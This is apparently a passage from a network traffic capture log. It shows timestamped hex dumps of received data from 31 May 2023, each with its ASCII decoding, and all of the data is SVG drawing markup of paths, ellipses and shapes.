                                                                                                                                                                                                                                                                                        Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6489INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6505INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                                                        Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6521INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6537INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6553INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                                        Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6569INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6585INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6601INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                                        Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6617INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6633INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6649INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:09 UTC6665INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                                                        Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6681INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                                        Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6697INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                                                        Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6713INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                                                        Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6729INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                                                        Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6745INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                                                        Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
